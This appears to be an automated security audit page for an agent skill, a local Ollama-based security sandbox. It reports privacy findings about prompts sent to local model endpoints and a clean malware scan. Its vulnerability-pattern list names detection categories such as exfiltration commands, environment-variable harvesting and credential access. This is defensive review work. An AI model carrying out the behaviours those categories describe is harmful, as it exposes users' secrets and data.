Security audit

Morgana Mordred Security Sandbox

Security checks across malware telemetry and agentic risk

Overview

This is a local Ollama-based security analysis tool, with privacy caveats but no evidence of hidden exfiltration, persistence, credential theft, or destructive behavior.

Install only if you are comfortable sending analyzed prompts to your local Ollama service. Avoid entering secrets or proprietary incident details unless you control that Ollama instance and its logs. Expect local model downloads and storage use, and note that the documented --stress and --gemma options do not match the current script behavior.

SkillSpector

By NVIDIA

Vulnerability Patterns

Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code

Findings (4)

Context-Inappropriate Capability

Medium

Confidence: 93% confidence
Finding: The code advertises a local security-analysis sandbox but transmits analyzed text over HTTP to an external local model service at localhost:11434 for embeddings. Even though the destination is loopback, the text leaves the process boundary and may be logged, retained, or handled by a different service than users expect, creating a disclosure and trust-boundary issue.

Context-Inappropriate Capability

Medium

Confidence: 89% confidence
Finding: The skill adds a second model call path via ask_gemma that sends the full question to a generation API for risk assessment, which expands data exposure and behavior beyond the STC classifier. This hidden capability increases the attack surface and can cause sensitive prompts to be processed by another subsystem without clear user awareness.

Missing User Warnings

Medium

Confidence: 96% confidence
Finding: User-supplied question text is sent directly to a local HTTP embeddings endpoint without notice, consent, or any privacy controls. If users provide secrets, incident details, or proprietary data, that information may be exposed to the model service, its logs, or any process bound to the same local port.

Missing User Warnings

Medium

Confidence: 96% confidence
Finding: The full question is also sent to a text-generation API without clear disclosure, further increasing privacy and data-handling risk. Because generation systems may log prompts or produce unexpected outputs, sending raw security questions or operational details can leak sensitive information beyond the intended analysis component.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal

Static analysis

No suspicious patterns detected.